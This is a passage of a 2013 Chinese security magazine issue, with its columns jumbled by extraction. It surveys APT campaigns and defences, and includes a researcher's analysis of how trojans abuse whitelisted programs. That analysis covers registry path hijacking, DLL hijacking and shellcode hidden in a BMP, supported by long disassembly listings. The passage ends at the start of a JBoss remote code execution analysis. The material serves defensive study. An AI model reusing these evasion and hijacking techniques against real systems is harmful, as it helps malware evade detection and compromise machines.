（例如bee.businessconsults.net）。 后通过解密工具找到帐号的密码，然 入等。被感染系统中所有的数据都 2011年8月份，McAfee/Sy- 后借助事先植入的木马在受害企业的 能传到攻击者指定的遍布全球的服 mantec发现并报告了该攻击。该攻 网络寻找目标、伺机行动、不断收集 务器上去。 击在长达数年的持续攻击过程中，渗 企业的敏感信息。 新型威胁的技术特点 透并攻击了全球多达70个公司和组 10.IXESHE攻击 综合分析以上典型的APT攻击，可以发现，当前的新型攻击主要呈现以下技术特点： 织的网络，包括美国政府、联合 4）所有的敏感信息会加密存储在网 国、红十字会、武器制造商、能源 络中的一台临时服务器上，并最终上 IXESHE（爱寿司）攻击行动是 1）攻击者的诱骗手段往往采用恶意网站，用钓鱼的方式诱使目标上钩。企业和组织目前的安全防御体系中对 公司、金融公司，等等。 传到公司外部的某个服务器上，从而 在2012年6月份披露出来的。该攻 于恶意网站的识别能力还不够，缺乏权威、全面的恶意网址库，对于内部员工访问恶意网站的行为无法及时发现； 完成攻击。 击主要针对的是东亚地区的政府、 6.Lurid攻击 台湾的电子企业，以及一个德国的 2）攻击者也经常采用恶意邮件的方式攻击受害者，并且这些邮件都被包装成合法的发件人。而企业和组织现 8. Luckycat攻击 电信公司。攻击手法采用的是发送 有的邮件过滤系统大部分就是基于垃圾邮件地址库的，显然，这些合法邮件不在其列。再者，邮件附件中隐含 2011年9月22日，TrendMi- 给特定目标的恶意邮件，里面的附 的恶意代码往往都是0day漏洞，传统的邮件内容分析也难以奏效； cro的研究人员公布了一起针对前 2012年3月份，TrendMicro发 件利用了多个当时的0day漏洞（包 独联体国家、印度、越南和中国等 布的报告中披露了一个针对印度和 括CVE-2009-4324和 3）还有一些攻击是直接通过对目标公网网站的SQL注入方式实现的。很多企业和组织的网站在防范SQL注入 国家的政府部门、外交部门、航天 日本的航空航天、军队、能源等单 CVE-2011-0609），以及其他多 攻击方面缺乏防范； 部门，还有科研机构APT攻击—— 位进行长时间的渗透和刺探的攻击 个已知漏洞。 Lurid攻击。 行动，并命名为Luckycat。 4）初始的网络渗透往往使用利用0day漏洞的恶意代码。而企业和组织目前的安全防御/检测设备无法识别这些 11.High Roller攻击 0day漏洞攻击； 攻击者的主要是利用了 根据报告显示，这次攻击行动依 CVE-2009-4324和 然是通过钓鱼邮件开始的，例如针 这个攻击的主要目标不是窃取信 5）在攻击者控制受害机器的过程中，往往使用SSL链接，导致现有的大部分内容检测系统无法分析传输的 CVE-2010-2883这两个已知的 对日本目标的钓鱼邮件的内容大都 息，而是金融盗窃。根据报告，该 内容，同时也缺乏对于可以连接的分析能力； Adobe Reader漏洞，以及被压 跟福岛核电站的核辐射问题有关。 攻击行动基于Zeus和SpyEye僵尸 缩成RAR文件的带有恶意代码的 然后就是利用了很多针对 pdf/rtf的 网络技术，并超越了这些技术，主 6）攻击者在持续不断获取受害企业和组织网络中的重要数据的时候，一定会向外部传输数据，这些数据往往 屏幕保护程序。 漏洞，包括CVE-2010-3333， 要的创新是：绕过物理的密码芯片 都是压缩、加密的，没有明显的指纹特征。这导致现有绝大部分基于特征库匹配的检测系统都失效了； CVE-2010-2883， 认证机制（例如USB key等双因素 7.Nitro攻击 CVE-2010-3654，CVE- 认证）、自动化的钱骡账户（也就 7）有的企业部署了内网审计系统，日志分析系统，甚至是安管平台。但是这些更高级的系统主要是从内控与 2011-0611，CVE-2011-2462等。 是用于转移资金的中间账户）、基 合规的角度来分析事件，而没有真正形成对外部入侵的综合分析。 2011年10月底，Symantec发布的 于服务器端的攻击（而一般的攻击 9.火焰病毒攻击 因此，在APT这样的新型威胁面前，大部分企业和组织的安全防御体系都失灵了。保障网络安全亟需全新 都是从客户端发起的）。 的思路和技术。

032 ｜ 互联网安全 互联网安全 ｜ 033 前 沿 THE CUTTING EDGE SECURITY INSIGHT 2013.11 www.securityinsight.com

新型威胁的四个技术发展动向

新型威胁自身也在不断发展进化，以适应新的安全监测、检 测与防御技术带来的挑战。以下简要分析新型威胁采取的一 新型威胁的应对之策 些新技术。

2011年，RSA与TechAmerica举办一次针对 APT的闭门峰会。与会专家总结了应对APT的10 条共识： 精准钓鱼是一种精确制导的钓鱼式攻击，比普通的定向钓鱼（spear

1）攻击手段已经从技术延伸到人。社会工程学是第 5）突发事件响应应该是整个组织的事情，而非纯安 phishing）更聚焦，只有在被攻击者名单中的人才会看到这个钓鱼网页 一位的威胁向量。人成为了新的网络边界，只要给定 全的事，并且要事先就制定好应对APT的突发事件响 ，其他人看到的则是404 error。如此一来，一方面攻击的精准度更高， 恰当的上下文，任何人都可能成为钓鱼受害者。而传 应程序/计划，并做好演练。 精准钓鱼 另一方面也更加保密，安全专家更难进行追踪。 统的对人员进行安全意识培训的方法也不足以应付钓 鱼攻击。 6）定制化——作为APT的一个重要特点——是对传 高级隐遁技术这个术语最初源自2010年芬兰的Stonesoft公司（2013年 统的基于签名（特征）的检测方法的重大挑战。定制 5月被McAfee收购）的研究成果。高级隐遁技术（AET，Advanced 2）组织必须学会在已经遭受攻击的情况下生存。阻 化即意味着攻击的目的性极强，并且利用0day包装出 Evasion Technology）是一种通过伪装和/或修饰网络攻击以躲避信息安 止攻击者进来是不现实的，更现实的做法是规划好在 一个攻击的速度极快，而研究出这个漏洞的签名（特 全系统的检测和阻止的手段。 高级隐遁技术 攻击者已经进来后应该采取什么响应动作。组织应该 征）则慢得多。 将重点放在如何尽快关闭遭受破坏的时间窗口，降低 损失上，例如隔离系统、阻止敏感信息外泄，以及回 7）目前攻击方在实时情报共享方面做的比防御者更 新型的恶意代码设计越来越精巧，想方设法逃避沙箱技术的检测。例如 到诸如“最小特权”、“纵深防御”这些核心的IT安全 好。防御者在情报共享方面存在诸多障碍。而快速有 有的恶意代码只有在用户鼠标移动的时候才会被执行，从而使得很多自 原则上来。防御的关键在于找到本组织中最核心 效的情报共享是目前的第一要务。 动化执行的沙箱没法检测到可疑行为。还有的沙箱用到了虚拟机方式来 最的、最需要受到保护的资产，清楚地知道这些资产 沙箱逃避 执行，那么恶意代码的制作者就会想办法去欺骗虚拟机。 在哪儿，谁对他进行了访问，在出现攻击的时候如何 8）组织必须积极主动地去尽早发现攻击，并用各种 将资产隔离（锁定）； 方式破坏攻击链条（路径）。 所谓“水坑攻击”，是指黑客通过分析被攻击者的网络活动规律，寻找被攻 击者经常访问的网站的弱点，先攻下该网站并植入攻击代码，等待被攻击者 3）要提前监测出威胁必须依靠态势感知，尤其是需 9）现在公开出来的APT攻击仅仅是冰山一角。同 要更大范围的态势感知，不能只关注于自身网络中的 时，除了关注数据窃取，还要关注其他目的的APT攻 来访时实施攻击。这种攻击行为类似《动物世界》纪录片中的一种情节：捕 水坑式攻击 态势，而要关注与自身网络相关的整个生态系统的态 击，例如poisoning, disruption，embarrassment 。 食者埋伏在水里或者水坑周围，等其他动物前来喝水时发起攻击猎取食物。 势。企业间合作共享十分重要。 10）简单的安全才是更好的安全。我们要简化我们 4）利用供应链发起攻击的情况正在抬头，供应链正 的技术环境（IT基础架构），只有更好的理解资产、流 在成为安全防御中的最薄弱环节，攻击者正在通过研 程和端点（终端）才有机会进行真正的防御。使用最 究和收集可信供应商的弱点来发起攻击。而对供应商 小的技术去达成一个目标。 的安全检测是一个巨大的挑战。可以借助一些方法， 例如信誉评级、第三方审计、外部监测等。

034 ｜ 互联网安全 互联网安全 ｜ 035 策 略 TACTICS SECURITY INSIGHT 2013.11 www.securityinsight.com

.text:00401038 lea edx, [esp+1Ch+Type] 木马反查杀技术分析之浅谈白利用 .text:0040103C push edx ; lpType .text:0040103D push eax ; lpReserved 邵坚磊 360公司安全研究员 .text:0040103E mov [esp+24h+Type], eax .text:00401042 mov eax, [esp+24h+hKey]

随着各个杀软防御查杀技术的逐渐成熟，云的日渐强大，传统的木马技术已经越来越力 .text:00401046 push offset ValueName ; "InstallDir" 不从心了，目前来看，能存活下去的主要就是BOOTKIT技术和白利用技术，相对于前者来 .text:0040104B push eax ; hKey 说，后者要简单而且容易的多。 .text:0040104C mov [esp+2Ch+cbData], 104h .text:00401054 call ds:RegQueryValueExW

白利用就是利用已经是白名单的文件来达到木马自身的目的，进入白名单的文件，又可 .text:0040105A test eax, eax 分为木马作者利用社会工程学，欺骗杀软的分析人员，将木马混入白名单，和正常程序本身 .text:0040105C jnz short loc_401060 设计的缺陷导致存在被利用的可能。前者没办法，对于后者，却是可以进行改善的。 .text:0040105E mov bl, 1 这里举个例子，一个白文件， MD5 42d439aca2e29fe2539fce37eec2220, QQPCUrl- .text:00401060 Loader.exe，应该是QQ系列的一个文件 .text:00401060 loc_401060: ; CODE XREF: GetQQPCMgrInstallDir+30j .text:00401060 ; GetQQPCMgrInstallDir+5Cj .text:00401060 cmp [esp+14h+hKey], 0 .text:00401065 jnz short loc_40106F text:00401000 GetQQPCMgrInstallDir proc near .text:00401067 push 0 ; hKey .text:00401000 .text:00401069 call ds:RegCloseKey .text:00401000 hKey = dword ptr -10h .text:0040106F .text:00401000 cbData = dword ptr -0Ch .text:0040106F loc_40106F: ; CODE XREF: GetQQPCMgrInstallDir+65j .text:00401000 Type = dword ptr -8 .text:0040106F mov ecx, [esp+14h+var_4] .text:00401000 var_4 = dword ptr -4 .text:00401073 mov al, bl .text:00401000 .text:00401075 pop ebx .text:00401000 sub esp, 10h .text:00401076 xor ecx, esp .text:00401003 mov eax, dword_40D008 .text:00401078 call sub_401185 .text:00401008 xor eax, esp .text:0040107D add esp, 10h .text:0040100A mov [esp+10h+var_4], eax .text:00401080 retn .text:0040100E push ebx .text:00401080 GetQQPCMgrInstallDir endp .text:0040100F lea eax, [esp+14h+hKey] .text:00401080 .text:00401013 push eax ; phkResult .text:00401080 ; .text:00401014 push offset SubKey ; "SOFTWARE\\Tencent\\QQPCMgr" ------.text:00401019 push 80000002h ; hKey .text:00401081 align 10h .text:0040101E mov [esp+20h+hKey], 0 .text:00401090 .text:00401026 xor bl, bl .text:00401090 ; ======S U B R O U T I N E .text:00401028 call ds:RegOpenKeyW ======.text:0040102E test eax, eax .text:00401090 .text:00401030 jnz short loc_401060 .text:00401090 .text:00401032 lea ecx, [esp+14h+cbData] .text:00401090 ExecuteQQPCMgr proc near ; CODE XREF: wWinMain(x,x,x,x)+65p .text:00401036 push ecx ; lpcbData .text:00401037 push esi ; lpData

036 ｜ 互联网安全 互联网安全 ｜ 037 策 略 TACTICS SECURITY INSIGHT 2013.11 www.securityinsight.com

.text:00401090 .text:00401100 .text:00401090 Dst = word ptr -414h .text:00401100 ; ======S U B R O U T I N E .text:00401090 var_412 = byte ptr -412h ======.text:00401090 var_4 = dword ptr -4 .text:00401100 .text:00401090 .text:00401100 .text:00401090 sub esp, 414h .text:00401100 ; int __stdcall wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, .text:00401096 mov eax, dword_40D008 LPWSTR lpCmdLine, int nShowCmd) .text:0040109B xor eax, esp .text:00401100 _wWinMain@16 proc near ; CODE XREF: ___tmainCRTStartup+171p .text:0040109D mov [esp+414h+var_4], eax .text:00401100 .text:004010A4 push 40Eh ; size_t .text:00401100 Dst = word ptr -210h .text:004010A9 lea eax, [esp+418h+var_412] .text:00401100 var_20E = byte ptr -20Eh .text:004010AD push 0 ; int .text:00401100 var_4 = dword ptr -4 .text:004010AF push eax ; void * .text:00401100 hInstance = dword ptr 4 .text:004010B0 mov [esp+420h+Dst], 0 .text:00401100 hPrevInstance = dword ptr 8 .text:004010B7 call _memset .text:00401100 lpCmdLine = dword ptr 0Ch .text:004010BC push edi .text:00401100 nShowCmd = dword ptr 10h .text:004010BD push esi .text:00401100 .text:004010BE push offset Format ; "\"%s\" %s" .text:00401100 sub esp, 210h .text:004010C3 lea ecx, [esp+42Ch+Dst] .text:00401106 mov eax, dword_40D008 .text:004010C7 push 208h ; SizeInWords .text:0040110B xor eax, esp .text:004010CC push ecx ; Dst .text:0040110D mov [esp+210h+var_4], eax .text:004010CD call _swprintf_s .text:00401114 push esi .text:004010D2 add esp, 20h .text:00401115 push edi .text:004010D5 push 1 ; nShowCmd .text:00401116 mov edi, [esp+218h+lpCmdLine] .text:004010D7 push 0 ; lpDirectory .text:0040111D push 208h ; size_t .text:004010D9 push edi ; lpParameters .text:00401122 lea eax, [esp+21Ch+var_20E] .text:004010DA push esi ; lpFile .text:00401126 push 0 ; int .text:004010DB push offset Operation ; "open" .text:00401128 push eax ; void * .text:004010E0 push 0 ; hwnd .text:00401129 mov [esp+224h+Dst], 0 .text:004010E2 call ds:ShellExecuteW .text:00401130 call _memset .text:004010E8 mov ecx, [esp+414h+var_4] .text:00401135 add esp, 0Ch .text:004010EF xor ecx, esp .text:00401138 lea esi, [esp+218h+Dst] .text:004010F1 call sub_401185 .text:0040113C call GetQQPCMgrInstallDir .text:004010F6 add esp, 414h .text:00401141 test al, al .text:004010FC retn .text:00401143 jnz short loc_40114A .text:004010FC ExecuteQQPCMgr endp .text:00401145 or eax, 0FFFFFFFFh .text:004010FC .text:00401148 jmp short loc_40116C .text:004010FC ; .text:0040114A ; ------.text:004010FD align 10h .text:0040114A

038 ｜ 互联网安全 互联网安全 ｜ 039 策 略 TACTICS SECURITY INSIGHT 2013.11 www.securityinsight.com

.text:0040114A loc_40114A: ; CODE XREF: wWinMain(x,x,x,x)+43j 前面我们简单介绍了白利用的一个例子，但实际上符合这种例子的情况还是比较少的，下面我们来说 .text:0040114A push offset Src ; "\\QQPCMgr.exe" 个，有大量可被利用的情况。 .text:0040114F lea ecx, [esp+21Ch+Dst] .text:00401153 push 104h ; SizeInWords 首先有个基本概念，就是导入表DLL，不懂的话，可以自己去搜索下，网上介绍很多，这里就不详 .text:00401158 push ecx ; Dst 细多说了，这里要介绍的就是通过该导入表DLL劫持，来达到白利用的目的。 .text:00401159 call _wcscat_s .text:0040115E add esp, 0Ch 下面举个远控木马的例子来进行说明 .text:00401161 lea esi, [esp+218h+Dst] .text:00401165 call ExecuteQQPCMgr .text:0040116A xor eax, eax .text:0040116C .text:0040116C loc_40116C: ; CODE XREF: wWinMain(x,x,x,x)+48j .text:0040116C mov ecx, [esp+218h+var_4] .text:00401173 pop edi .text:00401174 pop esi .text:00401175 xor ecx, esp .text:00401177 call sub_401185 .text:0040117C add esp, 210h .text:00401182 retn 10h .text:00401182 _wWinMain@16 endp 这个远控木马包括一个正常的白文件 MD5为 5A7921A112D6811009681863D8C2 这个程序会读取这个位置的键值，获取电脑管家的安装路径，然后不加校 BA76 验的启动这个路径下的QQPCMGR.exe文件

[HKEY_LOCAL_MACHINE\SOFTWARE\Tencent\QQPCMgr] "InstallDir" 该文件的特点就是导入表里导入了个自 里的目录路径，拼上QQPCMGR.exe这个名字的文件，所以木马只要把这个 己要用的DLL QQPCUrlLoader.exe放到启动项里，然后把自己的要启动的程序改名为 QQPCMGR.exe，同时将自己的路径写到注册表的这个位置，就可以达到开 机启动自身的目的。而常规情况下杀软的启动项扫描只能扫到QQPCUrl- Loader.exe的这个白文件，而扫不到被间接启动的木马文件，从而达到了绕 过杀软扫描的目的。同时也告诉我们，在我们自己写程序的时候，加载或运行 HPLOAD.DLL，实际上通过这种导入表引入函 但现在启发式很的情况下，这个DLL如果做太多 其他程序或模块的时候，是否是加载或运行所要的模块，还是可能被偷梁换柱 数，来调用所需要的函数的情况，在现在是非普遍的。 的事，则可能被启发式报出来，所以木马在这里又耍 的，最好应该加个校验，比如签名信息等。 了个滑头，这个DLL本身并不做太多的事，他只是读 木马就是劫持了这个DLL,把这个DLL替换成木马 取当前目录下的那个XXX.bmp文件，这个 自身的DLL，来启动自己。众所周知，当前很多杀软 XXX.BMP文件实际是个BMP图像文件，外带一堆木 防御都是基于进程级别的，没有做到模块级别，这 马的SHELLCODE,这样通过DLL，读取该文件中的 也是基于效率的考虑，但也同时给木马留下了大量 SHELLCODE来执行，来达到绕过启发式引擎的发 的机会。 现。因为没有人会去扫描一个BMP文件，也算是用 心良苦了。

040 ｜ 互联网安全 互联网安全 ｜ 041 策 略 TACTICS SECURITY INSIGHT 2013.11 www.securityinsight.com

.text:10001800 _DllMain@12_0 proc near ; CODE XREF: DllMain(x,x,x) j .text:1000185E push 0 ; lpDistanceToMoveHigh .text:10001800 .text:10001860 push eax ; lDistanceToMove .text:10001800 Buffer = byte ptr -6FCh .text:10001861 push esi ; hFile .text:10001800 var_6FB = byte ptr -6FBh .text:10001862 call ds:SetFilePointer .text:10001800 arg_0 = dword ptr 8 .text:10001868 nop .text:10001800 NumberOfBytesRead= dword ptr 0Ch .text:10001869 nop .text:10001800 .text:1000186A nop .text:10001800 push ebp .text:1000186B mov ecx, 1BEh .text:10001801 mov ebp, esp .text:10001870 xor eax, eax .text:10001803 sub esp, 6FCh .text:10001872 lea edi, [ebp+var_6FB] .text:10001809 mov eax, [ebp+NumberOfBytesRead] .text:10001878 mov [ebp+Buffer], 0 .text:1000180C cmp eax, 1 .text:1000187F rep stosd .text:1000180F jnz loc_100018EF .text:10001881 lea ecx, [ebp+NumberOfBytesRead] .text:10001815 push esi .text:10001884 push 0 ; lpOverlapped .text:10001816 nop .text:10001886 stosw .text:10001817 push 0 ; hTemplateFile .text:10001888 push ecx ; lpNumberOfBytesRead .text:10001819 push 80h ; dwFlagsAndAttributes .text:10001889 lea edx, [ebp+Buffer] .text:1000181E push 3 ; dwCreationDisposition .text:1000188F push 6FCh ; nNumberOfBytesToRead .text:10001820 push 0 ; lpSecurityAttributes .text:10001894 push edx ; lpBuffer .text:10001822 push 0 ; dwShareMode .text:10001895 push esi ; hFile .text:10001824 push 80000000h ; dwDesiredAccess .text:10001896 stosb .text:10001829 push offset FileName ; "xxx.bmp" .text:10001897 call ds:ReadFile .text:1000182E call ds:CreateFileA .text:1000189D nop .text:10001834 mov esi, eax .text:1000189E nop .text:10001836 cmp esi, 0FFFFFFFFh .text:1000189F push esi ; hObject .text:10001839 jz short loc_100018AF .text:100018A0 call ds:CloseHandle .text:1000183B push edi .text:100018A6 lea eax, [ebp+Buffer] .text:1000183C nop .text:100018AC call eax .text:1000183D nop .text:100018AE pop edi .text:1000183E nop .text:100018AF .text:1000183F push 0 ; lpFileSizeHigh .text:100018AF loc_100018AF: ; CODE XREF: _DllMain@12_0+39 j .text:10001841 push esi ; hFile .text:100018AF mov ecx, [ebp+arg_0] .text:10001842 mov [ebp+NumberOfBytesRead], 0 .text:100018B2 push ecx ; struct HINSTANCE__ * .text:10001849 call ds:GetFileSize .text:100018B3 push offset unk_10005548 ; struct AFX_EXTENSION_MODULE * .text:1000184F mov [ebp+NumberOfBytesRead], eax .text:100018B8 call ?AfxInitExtensionModule@@YGHAAUAFX_EXTENSION_MOD- .text:10001852 nop ULE@@PAUHINSTANCE__@@@Z ; AfxInitExtensionModule(AFX_EXTENSION_MODULE .text:10001853 nop &,HINSTANCE__ *) .text:10001854 mov eax, [ebp+NumberOfBytesRead] .text:100018BD test eax, eax .text:10001857 push 0 ; dwMoveMethod .text:100018BF pop esi .text:10001859 add eax, 0FFFFF904h .text:100018C0 jnz short loc_100018C8

042 ｜ 互联网安全 互联网安全 ｜ 043 策 略 TACTICS SECURITY INSIGHT 2013.11 www.securityinsight.com

.text:100018C2 mov esp, ebp .text:004041A0 mov [ebp+var_48], eax .text:100018C4 pop ebp .text:004041A3 push esi .text:100018C5 retn 0Ch .text:004041A4 mov [ebp+var_198], 0 .text:100018C8 ; .text:004041AB push 10Fh ; size_t ------.text:004041B0 push 0 ; int .text:100018C8 .text:004041B2 lea eax, [ebp+var_197] .text:100018C8 loc_100018C8: ; CODE XREF: _DllMain@12_0+C0 j .text:004041B8 push eax ; void * .text:100018C8 push 40h ; unsigned int .text:004041B9 call _memset .text:100018CA call ??2@YAPAXI@Z ; operator new(uint) .text:004041BE add esp, 0Ch .text:100018CF add esp, 4 .text:004041C1 mov [ebp+Param], 0 .text:100018D2 test eax, eax .text:004041CB push 24Ch ; size_t .text:100018D4 jz short loc_100018FE .text:004041D0 push 0 ; int .text:100018D6 push 0 .text:004041D2 lea ecx, [ebp+TimerQueue] .text:100018D8 push offset unk_10005548 .text:004041D8 push ecx ; void * .text:100018DD mov ecx, eax .text:004041D9 call _memset .text:100018DF call ??0CDynLinkLibrary@@QAE@AAUAFX_EXTENSION_MOD- .text:004041DE add esp, 0Ch ULE@@H@Z ; CDynLinkLibrary::CDynLinkLibrary(AFX_EXTENSION_MODULE &,int) .text:004041E1 mov [ebp+lf.lfHeight], 0 .text:100018E4 mov eax, 1 .text:004041EB push 38h ; size_t .text:100018E9 mov esp, ebp .text:004041ED push 0 ; int .text:100018EB pop ebp .text:004041EF lea edx, [ebp+lf.lfWidth] .text:100018EC retn 0Ch .text:004041F2 push edx ; void * .text:004041F3 call _memset .text:004041F8 add esp, 0Ch 从XXX.BMP最后末尾-0x6FC处读取0X6FC个字节的SHELLCODE，然后通过 .text:004041FB push offset LibFileName ; "wtsapi32.dll" CALL EAX来执行这个SHELLCODE. .text:00404200 call ds:LoadLibraryA .text:00404206 mov [ebp+hLibModule], eax 前面所说的导入表DLL劫持，其实还是可以被检测出来，杀软通过扫描可执行 .text:00404209 mov [ebp+var_410], 0 EXE 文件的导入表，就可以知道该程序会用到哪些DLL。下面要说的是更为隐蔽的方 .text:00404213 mov [ebp+var_40], 0 法，白程序内部通过LoadLibrary来加载DLL,而木马通过劫持这个DLL，来达到白利 .text:0040421A mov [ebp+var_414], 0 用的目的。举个例子 .text:00404224 mov [ebp+hThread], 0 .text:0040422E mov [ebp+var_34.cbSize], 0 MD5为E07CF32207C7BD95AA04A982755CDFA8，貌似是联想的程序。 .text:00404235 push 2Ch ; size_t .text:00404237 push 0 ; int .text:00404239 lea eax, [ebp+var_34.style] .text:0040423C push eax ; void * .text:00404190 push ebp .text:0040423D call _memset .text:00404191 mov ebp, esp .text:00404242 add esp, 0Ch .text:00404193 sub esp, 43Ch .text:00404245 mov [ebp+Msg.hwnd], 0 .text:00404199 mov eax, dword_42546C .text:0040424F xor ecx, ecx .text:0040419E xor eax, ebp .text:00404251 mov [ebp+Msg.message], ecx

044 ｜ 互联网安全 互联网安全 ｜ 045 策 略 TACTICS SECURITY INSIGHT 2013.11 www.securityinsight.com

.text:00404257 mov [ebp+Msg.wParam], ecx .text:00403EC3 sub esp, 134h .text:0040425D mov [ebp+Msg.lParam], ecx .text:00403EC9 mov eax, dword_42546C .text:00404263 mov [ebp+Msg.time], ecx .text:00403ECE xor eax, ebp .text:00404269 mov [ebp+Msg.pt.x], ecx .text:00403ED0 mov [ebp+var_8], eax .text:0040426F mov [ebp+Msg.pt.y], ecx .text:00403ED3 mov [ebp+var_118], 0 .text:00404275 mov [ebp+hObject], 0 .text:00403EDD mov [ebp+Start], 0 .text:0040427C mov [ebp+var_408], 0 .text:00403EE4 push 103h ; size_t .text:00404286 push 0FFFFFFFFh ; DWORD .text:00403EE9 push 0 ; int .text:00404288 call ImmDisableIME .text:00403EEB lea eax, [ebp+var_10F] .text:0040428D push offset aEnlpu32_dll ; "enlpu32.dll" .text:00403EF1 push eax ; void * .text:00404292 call sub_403EC0 .text:00403EF2 call _memset .text:00404297 add esp, 4 .text:00403EF7 add esp, 0Ch .text:0040429A mov [ebp+var_408], eax .text:00403EFA mov [ebp+var_120], 104h .text:004042A0 push offset aLocalMutexThin ; "Local\\mutex ThinkPad OSD" .text:00403F04 mov [ebp+var_4], 0 .text:004042A5 push 1 ; bInitialOwner .text:00403F0B mov [ebp+hLibModule], 0 .text:004042A7 push 0 ; lpMutexAttributes .text:00403F15 mov [ebp+var_114], 0 .text:004042A9 call ds:CreateMutexA .text:00403F1F push 104h ; nSize .text:004042AF mov [ebp+hObject], eax .text:00403F24 lea ecx, [ebp+Start] .text:004042B2 call ds:GetLastError .text:00403F2A push ecx ; lpFilename …… .text:00403F2B push 0 ; hModule .text:00403F2D call ds:GetModuleFileNameA .text:00403EC0 sub_403EC0 proc near ; CODE XREF: WinMain(x,x,x,x)+102 p .text:00403F33 neg eax .text:00403EC0 .text:00403F35 sbb eax, eax .text:00403EC0 var_134 = dword ptr -134h .text:00403F37 neg eax .text:00403EC0 var_130 = dword ptr -130h .text:00403F39 mov [ebp+var_118], eax .text:00403EC0 var_12C = dword ptr -12Ch .text:00403F3F jz short loc_403F67 .text:00403EC0 var_128 = dword ptr -128h .text:00403F41 push 5Ch ; wMatch .text:00403EC0 var_124 = dword ptr -124h .text:00403F43 push 0 ; lpEnd .text:00403EC0 var_120 = dword ptr -120h .text:00403F45 lea edx, [ebp+Start] .text:00403EC0 hLibModule = dword ptr -11Ch .text:00403F4B push edx ; lpStart .text:00403EC0 var_118 = dword ptr -118h .text:00403F4C call ds:StrRChrA .text:00403EC0 var_114 = dword ptr -114h .text:00403F52 mov [ebp+var_4], eax .text:00403EC0 Start = byte ptr -110h .text:00403F55 cmp [ebp+var_4], 0 .text:00403EC0 var_10F = byte ptr -10Fh .text:00403F59 jz short loc_403F67 .text:00403EC0 var_8 = dword ptr -8 .text:00403F5B mov [ebp+var_124], 1 .text:00403EC0 var_4 = dword ptr -4 .text:00403F65 jmp short loc_403F71 .text:00403EC0 arg_0 = dword ptr 8 .text:00403F67 ; .text:00403EC0 ------.text:00403EC0 push ebp .text:00403F67 .text:00403EC1 mov ebp, esp .text:00403F67 loc_403F67: ; CODE XREF: sub_403EC0+7F j

046 ｜ 互联网安全 互联网安全 ｜ 047 策 略 TACTICS SECURITY INSIGHT 2013.11 www.securityinsight.com

.text:00403F67 ; sub_403EC0+99 j .text:00403FDF mov edx, [ebp+var_128] .text:00403F67 mov [ebp+var_124], 0 .text:00403FE5 mov [ebp+var_118], edx .text:00403F71 .text:00403FEB cmp [ebp+var_118], 0 .text:00403F71 loc_403F71: ; CODE XREF: sub_403EC0+A5 j .text:00403FF2 jz short loc_40401C .text:00403F71 mov eax, [ebp+var_124] .text:00403FF4 lea eax, [ebp+Start] .text:00403F77 mov [ebp+var_118], eax .text:00403FFA push eax ; lpLibFileName .text:00403F7D cmp [ebp+var_118], 0 .text:00403FFB call ds:LoadLibraryA .text:00403F84 jz short loc_403FA8 .text:00404001 mov [ebp+hLibModule], eax .text:00403F86 mov ecx, [ebp+var_4] .text:00404007 cmp [ebp+hLibModule], 0 .text:00403F89 add ecx, 1 .text:0040400E jz short loc_40401C .text:00403F8C mov [ebp+var_4], ecx .text:00404010 mov [ebp+var_12C], 1 .text:00403F8F mov edx, [ebp+var_4] .text:0040401A jmp short loc_404026 .text:00403F92 lea eax, [ebp+Start] .text:0040401C ; .text:00403F98 sub edx, eax ------.text:00403F9A mov ecx, [ebp+var_120] .text:0040401C .text:00403FA0 sub ecx, edx .text:0040401C loc_40401C: ; CODE XREF: sub_403EC0+132 j .text:00403FA2 mov [ebp+var_120], ecx .text:0040401C ; sub_403EC0+14E j .text:00403FA8 .text:0040401C mov [ebp+var_12C], 0 .text:00403FA8 loc_403FA8: ; CODE XREF: sub_403EC0+C4 j .text:00404026 .text:00403FA8 cmp [ebp+var_118], 0 .text:00404026 loc_404026: ; CODE XREF: sub_403EC0+15A j .text:00403FAF jz short loc_403FD5 .text:00404026 mov ecx, [ebp+var_12C] .text:00403FB1 mov edx, [ebp+arg_0] .text:0040402C mov [ebp+var_118], ecx .text:00403FB4 push edx .text:00404032 cmp [ebp+var_118], 0 .text:00403FB5 mov eax, [ebp+var_120] .text:00404039 jz short loc_404068 .text:00403FBB push eax .text:0040403B push offset ProcName ; "EnableLPU" .text:00403FBC mov ecx, [ebp+var_4] .text:00404040 mov edx, [ebp+hLibModule] .text:00403FBF push ecx .text:00404046 push edx ; hModule .text:00403FC0 call sub_404A30 .text:00404047 call ds:GetProcAddress .text:00403FC5 test eax, eax .text:0040404D mov [ebp+var_114], eax .text:00403FC7 jl short loc_403FD5 .text:00404053 cmp [ebp+var_114], 0 .text:00403FC9 mov [ebp+var_128], 1 .text:0040405A jz short loc_404068 .text:00403FD3 jmp short loc_403FDF .text:0040405C mov [ebp+var_130], 1 .text:00403FD5 ; .text:00404066 jmp short loc_404072 ------.text:00404068 ; .text:00403FD5 ------.text:00403FD5 loc_403FD5: ; CODE XREF: sub_403EC0+EF j .text:00404068 .text:00403FD5 ; sub_403EC0+107 j .text:00404068 loc_404068: ; CODE XREF: sub_403EC0+179 j .text:00403FD5 mov [ebp+var_128], 0 .text:00404068 ; sub_403EC0+19A j .text:00403FDF .text:00404068 mov [ebp+var_130], 0 .text:00403FDF loc_403FDF: ; CODE XREF: sub_403EC0+113 j .text:00404072

048 ｜ 互联网安全 互联网安全 ｜ 049 策 略 TACTICS SECURITY INSIGHT 2013.11 www.securityinsight.com

.text:00404072 loc_404072: ; CODE XREF: sub_403EC0+1A6 j .text:00404072 mov eax, [ebp+var_130] jboss远程命令执行漏洞分析 .text:00404078 mov [ebp+var_118], eax 苏 洵 360公司安全研究员 .text:0040407E cmp [ebp+var_118], 0 .text:00404085 jz short loc_40409D .text:00404087 call [ebp+var_114] .text:0040408D test eax, eax .text:0040408F jz short loc_40409D 1.漏洞概要 .text:00404091 mov [ebp+var_134], 1 .text:0040409B jmp short loc_4040A7 漏洞描述： .text:0040409D ; JBOSS中的http-invoker程序提供JMXInvokerServlet以及EJBInvokerServlet来处理被序列化 ------后的请求，JMX Invoker默认是运行的，并且未作任何验证，我们可以构造任何形式的请求向其发 .text:0040409D 送，url为http://localhost:8080/invoker/JMXInvokerServlet。JMXInvokerServlet能够处理被 .text:0040409D loc_40409D: ; CODE XREF: sub_403EC0+1C5 j 序列化之后的JMX invocation（一些类），并将其反序列化成MBean。例如，被反序列化成 .text:0040409D ; sub_403EC0+1CF j MainDeployer MBean，可以下载任意war包；被反序列化成BSHDeployer MBean可以创建文 .text:0040409D mov [ebp+var_134], 0 件。这样，我们构造POST请求并将被序列化后的字符串放入其中发送给/invoker/JMXInvok- .text:004040A7 